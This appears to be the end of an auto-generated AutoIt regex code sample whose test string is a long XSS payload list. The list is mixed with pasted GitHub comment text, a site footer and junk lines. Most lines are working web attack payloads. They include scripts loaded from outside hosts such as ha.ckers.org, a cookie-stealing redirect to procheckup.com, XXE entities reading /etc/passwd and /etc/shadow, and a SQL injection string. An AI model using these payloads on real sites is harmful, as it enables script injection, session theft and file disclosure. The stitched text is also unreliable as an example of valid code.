"<;SCRIPT SRC=http://ha.ckers.org/xss.js" & @CRLF & _
"<;SCRIPT SRC=//ha.ckers.org/.j>;" & @CRLF & _
"<;IMG SRC=";javascript:alert(';XSS';)";" & @CRLF & _
"<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;" & @CRLF & _
"<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;" & @CRLF & _
"<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;" & @CRLF & _
"<;SCRIPT>;a=/XSS/" & @CRLF & _
"<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;" & @CRLF & _
"<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;" & @CRLF & _
"<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;" & @CRLF & _
"<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;" & @CRLF & _
"<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;" & @CRLF & _
"<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;" & @CRLF & _
"<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;" & @CRLF & _
"<;A HREF=";http://66.102.7.147/";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";http://1113982867/";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";//www.google.com/";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";//google";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";http://google.com/";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";http://www.google.com./";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;" & @CRLF & _
"<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;" & @CRLF & _
"<script>document.vulnerable=true;</script>" & @CRLF & _
"<img SRC="jav ascript:document.vulnerable=true;">" & @CRLF & _
"<img SRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<img SRC="  javascript:document.vulnerable=true;">" & @CRLF & _
"<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>" & @CRLF & _
"<<SCRIPT>document.vulnerable=true;//<</SCRIPT>" & @CRLF & _
"<script <B>document.vulnerable=true;</script>" & @CRLF & _
"<img SRC="javascript:document.vulnerable=true;"" & @CRLF & _
"<iframe src="javascript:document.vulnerable=true; <" & @CRLF & _
"<script>a=/XSS/\ndocument.vulnerable=true;</script>" & @CRLF & _
"\";document.vulnerable=true;;//" & @CRLF & _
"</title><SCRIPT>document.vulnerable=true;</script>" & @CRLF & _
"<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<body BACKGROUND="javascript:document.vulnerable=true;">" & @CRLF & _
"<body ONLOAD=document.vulnerable=true;>" & @CRLF & _
"<img DYNSRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<img LOWSRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<bgsound SRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<br SIZE="&{document.vulnerable=true}">" & @CRLF & _
"<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>" & @CRLF & _
"<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">" & @CRLF & _
"<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS" & @CRLF & _
"<img SRC='vbscript:document.vulnerable=true;'>" & @CRLF & _
"1script3document.vulnerable=true;1/script3" & @CRLF & _
"<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">" & @CRLF & _
"<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">" & @CRLF & _
"<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>" & @CRLF & _
"<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>" & @CRLF & _
"<table BACKGROUND="javascript:document.vulnerable=true;">" & @CRLF & _
"<table><TD BACKGROUND="javascript:document.vulnerable=true;">" & @CRLF & _
"<div STYLE="background-image: url(javascript:document.vulnerable=true;)">" & @CRLF & _
"<div STYLE="background-image: url(javascript:document.vulnerable=true;)">" & @CRLF & _
"<div STYLE="width: expression(document.vulnerable=true);">" & @CRLF & _
"<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>" & @CRLF & _
"<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">" & @CRLF & _
"<XSS STYLE="xss:expression(document.vulnerable=true)">" & @CRLF & _
"exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>" & @CRLF & _
"<style TYPE="text/javascript">document.vulnerable=true;</style>" & @CRLF & _
"<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>" & @CRLF & _
"<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>" & @CRLF & _
"<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->" & @CRLF & _
"<base HREF="javascript:document.vulnerable=true;//">" & @CRLF & _
"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>" & @CRLF & _
"<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>" & @CRLF & _
"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>" & @CRLF & _
"<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>" & @CRLF & _
"<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>" & @CRLF & _
"<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">" & @CRLF & _
"<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-" & @CRLF & _
"<a href="javascript#document.vulnerable=true;">" & @CRLF & _
"<div onmouseover="document.vulnerable=true;">" & @CRLF & _
"<img src="javascript:document.vulnerable=true;">" & @CRLF & _
"<img dynsrc="javascript:document.vulnerable=true;">" & @CRLF & _
"<input type="image" dynsrc="javascript:document.vulnerable=true;">" & @CRLF & _
"<bgsound src="javascript:document.vulnerable=true;">" & @CRLF & _
"&<script>document.vulnerable=true;</script>" & @CRLF & _
"&{document.vulnerable=true;};" & @CRLF & _
"<img src=&{document.vulnerable=true;};>" & @CRLF & _
"<link rel="stylesheet" href="javascript:document.vulnerable=true;">" & @CRLF & _
"<iframe src="vbscript:document.vulnerable=true;">" & @CRLF & _
"<img src="mocha:document.vulnerable=true;">" & @CRLF & _
"<img src="livescript:document.vulnerable=true;">" & @CRLF & _
"<a href="about:<script>document.vulnerable=true;</script>">" & @CRLF & _
"<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">" & @CRLF & _
"<body onload="document.vulnerable=true;">" & @CRLF & _
"<div style="background-image: url(javascript:document.vulnerable=true;);">" & @CRLF & _
"<div style="behaviour: url([link to code]);">" & @CRLF & _
"<div style="binding: url([link to code]);">" & @CRLF & _
"<div style="width: expression(document.vulnerable=true;);">" & @CRLF & _
"<style type="text/javascript">document.vulnerable=true;</style>" & @CRLF & _
"<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">" & @CRLF & _
"<style><!--</style><script>document.vulnerable=true;//--></script>" & @CRLF & _
"<<script>document.vulnerable=true;</script>" & @CRLF & _
"<![<!--]]<script>document.vulnerable=true;//--></script>" & @CRLF & _
"<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->" & @CRLF & _
"<img src="blah"onmouseover="document.vulnerable=true;">" & @CRLF & _
"<img src="blah>" onmouseover="document.vulnerable=true;">" & @CRLF & _
"<xml src="javascript:document.vulnerable=true;">" & @CRLF & _
"<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>" & @CRLF & _
"<div datafld="b" dataformatas="html" datasrc="#X"></div>" & @CRLF & _
"[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>" & @CRLF & _
"<style>@import'http://www.securitycompass.com/xss.css';</style>" & @CRLF & _
"<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">" & @CRLF & _
"<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>" & @CRLF & _
"<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>" & @CRLF & _
"<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>" & @CRLF & _
"<script SRC="http://www.securitycompass.com/xss.jpg"></script>" & @CRLF & _
"<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->" & @CRLF & _
"<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script =">" SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]" & @CRLF & _
"";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;" & @CRLF & _
"<;/script>;<;script>;alert(1)<;/script>;" & @CRLF & _
"<;/br style=a:expression(alert())>;" & @CRLF & _
"<;scrscriptipt>;alert(1)<;/scrscriptipt>;" & @CRLF & _
"<;br size=\";&;{alert('XSS')}\";>;" & @CRLF & _
"perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out" & @CRLF & _
"perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out" & @CRLF & _
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>" & @CRLF & _
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"<~/XSS STYLE=xss:expression(alert('XSS'))>" & @CRLF & _
""><script>alert('XSS')</script>" & @CRLF & _
"</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"XSS STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"</XSS STYLE=xss:expression(alert('XSS'))>" & @CRLF & _
">"><script>alert("XSS")</script>&" & @CRLF & _
""><STYLE>@import"javascript:alert('XSS')";</STYLE>" & @CRLF & _
">"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>" & @CRLF & _
">%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>" & @CRLF & _
"'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'" & @CRLF & _
"">" & @CRLF & _
">"" & @CRLF & _
"'';!--"<XSS>=&{()}" & @CRLF & _
"<IMG SRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC=JaVaScRiPt:alert('XSS')>" & @CRLF & _
"<IMG SRC=JaVaScRiPt:alert("XSS<WBR>")>" & @CRLF & _
"<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>" & @CRLF & _
"<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> " & @CRLF & _
"<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>" & @CRLF & _
"<IMG SRC="jav
ascript:alert(<WBR>'XSS');">" & @CRLF & _
"<IMG SRC="jav
ascript:alert(<WBR>'XSS');">" & @CRLF & _
"<![CDATA[<script>var n=0;while(true){n++;}</script>]]>" & @CRLF & _
"<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>" & @CRLF & _
"<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>" & @CRLF & _
"<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>" & @CRLF & _
"<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>" & @CRLF & _
"<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>" & @CRLF & _
"<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>" & @CRLF & _
"<script>alert('XSS')</script>" & @CRLF & _
"%3cscript%3ealert('XSS')%3c/script%3e" & @CRLF & _
"%22%3e%3cscript%3ealert('XSS')%3c/script%3e" & @CRLF & _
"<IMG SRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG SRC=javascript:alert("XSS")>" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')> " & @CRLF & _
"<img src=xss onerror=alert(1)>" & @CRLF & _
"<IMG """><SCRIPT>alert("XSS")</SCRIPT>">" & @CRLF & _
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" & @CRLF & _
"<IMG SRC="jav ascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="jav	ascript:alert('XSS');">" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<BODY BACKGROUND="javascript:alert('XSS')">" & @CRLF & _
"<BODY ONLOAD=alert('XSS')>" & @CRLF & _
"<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="javascript:alert('XSS')"" & @CRLF & _
"<iframe src=http://ha.ckers.org/scriptlet.html <" & @CRLF & _
"<<SCRIPT>alert("XSS");//<</SCRIPT>" & @CRLF & _
"%253cscript%253ealert(1)%253c/script%253e" & @CRLF & _
""><s"%2b"cript>alert(document.cookie)</script>" & @CRLF & _
"foo<script>alert(1)</script>" & @CRLF & _
"<scr<script>ipt>alert(1)</scr</script>ipt>" & @CRLF & _
"<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>" & @CRLF & _
"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>" & @CRLF & _
"<marquee onstart='javascript:alert('1');'>=(◕_◕)=" & @CRLF & _
"<iframe src="http://ha.ckers.org/scriptlet.html"></iframe>" & @CRLF & _
"<;/script>;<;script>;alert(1)<;/script>;" & @CRLF & _
"@ismilsen" & @CRLF & _
"ismilsen commented on 13 Jan 2018" & @CRLF & _
"<marquee onstart='javascript:alert('1');'>=(◕_◕)=" & @CRLF & _
"" & @CRLF & _
"@ismilsen" & @CRLF & _
"ismilsen commented on 13 Jan 2018" & @CRLF & _
"No description provided." & @CRLF & _
"" & @CRLF & _
"@ismilsen" & @CRLF & _
"ismilsen commented on 13 Jan 2018" & @CRLF & _
"<;/script>;<;script>;alert(1)<;/script>;" & @CRLF & _
"" & @CRLF & _
"@ismilsen" & @CRLF & _
"ismilsen commented on 13 Jan 2018" & @CRLF & _
"s" & @CRLF & _
"" & @CRLF & _
"<iframe src="http://ha.ckers.org/scriptlet.html"></iframe>" & @CRLF & _
"@bloodyk1ng" & @CRLF & _
"bloodyk1ng commented on 13 Apr 2018 • " & @CRLF & _
"123" & @CRLF & _
"" & @CRLF & _
"@bloodyk1ng" & @CRLF & _
"bloodyk1ng commented on 13 Apr 2018 • " & @CRLF & _
"No description provided." & @CRLF & _
"" & @CRLF & _
"@butch310" & @CRLF & _
"butch310 commented on 22 May 2018" & @CRLF & _
"=(◕_◕)=" & @CRLF & _
"" & @CRLF & _
"@anton7r" & @CRLF & _
"anton7r commented on 28 Jun 2019" & @CRLF & _
"Cool, alot of vectors" & @CRLF & _
"" & @CRLF & _
"@JaxonWright" & @CRLF & _
"JaxonWright commented on 26 Nov 2019" & @CRLF & _
"=(◕_◕)=" & @CRLF & _
"" & @CRLF & _
" to join this conversation on GitHub. Already have an account? Sign in to comment" & @CRLF & _
"© 2020 GitHub, Inc." & @CRLF & _
"Terms" & @CRLF & _
"Privacy" & @CRLF & _
"Security" & @CRLF & _
"Status" & @CRLF & _
"Help" & @CRLF & _
"Contact GitHub" & @CRLF & _
"Pricing" & @CRLF & _
"API" & @CRLF & _
"Training" & @CRLF & _
"Blog" & @CRLF & _
"About" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"<script>Hello world!</script>" & @CRLF & _
"<boldb>Goodbye world!</bold>" & @CRLF & _
"<b>This turkey won't fly.</b>" & @CRLF & _
"<a></a>" & @CRLF & _
"<b onmouseover=alert(‘XSS testing!‘)></b>" & @CRLF & _
"<body onload=alert('test1')>" & @CRLF & _
"<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>" & @CRLF & _
"<arigato></arigato>" & @CRLF & _
"<.ujjghgh></.uuujjjk>" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
">>> Your new user agent string here <<<" & @CRLF & _
"" & @CRLF & _
"</SCRIPT>sdadadadsada" & @CRLF & _
"<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">" & @CRLF & _
"" & @CRLF & _
"<IMG SRC=JaVaScRiPt:alert('XSS')>" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>" & @CRLF & _
"<a onmouseover=”alert(document.cookie)”>xxs link</a>" & @CRLF & _
"<SCRIPT SRC=http://xss.rocks/xss.js?< B >" & @CRLF & _
"" & @CRLF & _
"<BODY ONLOAD=alert('XSS')>" & @CRLF & _
"" & @CRLF & _
"<@httph>" & @CRLF & _
"< v reanghghtert50150015881215800167690000>" & @CRLF & _
""
Local $aArray = StringRegExp($sString, $sRegex, $STR_REGEXPARRAYGLOBALFULLMATCH)
Local $aFullArray[0]
For $i = 0 To UBound($aArray) -1
_ArrayConcatenate($aFullArray, $aArray[$i])
Next
$aArray = $aFullArray
; Present the entire match result
_ArrayDisplay($aArray, "Result")
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for AutoIt, please visit: https://www.autoitscript.com/autoit3/docs/functions/StringRegExp.htm